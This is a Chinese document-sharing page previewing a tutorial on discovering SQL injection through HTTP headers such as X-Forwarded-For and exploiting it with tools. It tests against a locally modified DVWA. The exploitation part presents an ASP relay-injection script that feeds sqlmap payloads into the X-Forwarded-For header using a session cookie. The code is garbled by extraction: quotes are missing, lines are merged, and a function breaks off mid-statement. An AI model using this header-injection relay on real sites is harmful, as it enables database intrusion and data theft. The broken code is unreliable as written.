HTTP头注入的发现和工具化利用.docx_第1页
HTTP头注入的发现和工具化利用.docx_第2页
HTTP头注入的发现和工具化利用.docx_第3页
HTTP头注入的发现和工具化利用.docx_第4页
HTTP头注入的发现和工具化利用.docx_第5页
已阅读5页,还剩1页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

目前市面上web漏扫均可以轻易的检测出以GET或POST方式传参的sql注入点,在实际测试过程中,笔者发现多数漏扫检测HTTP头注入问题的能力还不是太理想,这里分享下对于HTTP头注入的发现和利用过程,欢迎各位大牛批评指正。0x01、HTTP头注入的发现推荐使用安装了Modify Headers插件的火狐浏览器对目标站点进行信息收集,该插件可以自定义HTTP 头信息,截图如下:界面很简单,其中select action下拉单中的三个选项中modify比add优先级高,filter为过滤头字段操作,这里以新增http头字段X-Forwarded-For为例,下图红框中最前面选择add,紧跟着写入X-Forwarded-For,然后输入自定义的数值:我这里输入“x-for;xxoo!-”(不含引号),配置完成后依次点击save、确定即完成配置。然后使用火狐浏览器浏览存在X-Forwarded-For sql注入漏洞的站点,这里笔者略微改动下dvwa,以配合测试,如图:用配置好的火狐登录dvwa后,点击SQL injection选项,user id随便输入后点击submit,弹出典型的sql注入报错页面如图:实际测试中,我们可以同时定义多个http head字段,然后浏览目标网站,进而发现漏洞,用该配置浏览器上网,常有意外收获,这里贴一张实测截图:0x02、HTTP头SQL注入的工具化利用漏洞发现了,下面讲讲利用。多数注入工具仅能覆盖http头中的cookie、user-agent等字段,对于X-Forwarded-For 等部分字段并不能全面覆盖。对于X-Forwarded-For sql注入,网上多是通过抓包增加“X-Forwarded-For :*”内容,然后利用Sqlmap r 方式对其注入,笔者曾使用sqlmap1.0,同时测试变更level参数等操作,最终并未成功利用,这里还望实验成功的大牛指点。下面笔者介绍一个利用寂寞的刺猬中转注入实现工具化利用的方法。 在寂寞的刺猬的中转注入代码中添加头字段X-Forwarded-For并赋值,值得注意的是这里不需要url编码和空格替换,代码略作修改后如下:%感谢寂寞的刺猬sqlStr=request(g)存在注入点的文件actionUrl=37/dvwa/vulnerabilities/sqli/?id=&Submit=Submit来源URLrefUrl=37/dvwa/vulnerabilities/sqli/添加cookie信息,实现过认证注入cookieStr=security=low; PHPSESSID=23887004dcb450bd3632e2bab6d30a31发起HTTP请求response.write PostData(actionUrl,sqlStr,cookieStr,refUrl)构造HTTP头注入数据包Function PostData(PostUrl,PostStr,PostCok,PostRef) Dim HttpSet Http = Server.CreateObject(msxml2.serverXMLHTTP)With Http.Open POST,PostUrl,False.SetRequestHeader Content-Length,Len(PostStr).SetRequestHeader Content-Type,application/x-www-form-urlencoded.SetRequestHeader Referer,PostRef.SetRequestHeader Cookie,PostCok.SetRequestHeader X-Forwarded-For,PostStr.Send GPostData = .ResponseBody End WithSet Http = NothingPostData =bytes2BSTR(PostData)End FunctionFunction bytes2BSTR(vIn)Dim strReturnDim I, ThisCharCode, NextCharCodestrReturn = For I = 1 To LenB(vIn)ThisCharCode = AscB(MidB(vIn, I, 1)If ThisCharCode 本地搭建后利用sqlmap测试如图:Wireshake抓包可以看到http 注入包构造成功0x03、写在最后一切输入都是“有害”的。web数据交互不仅仅局限于G

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论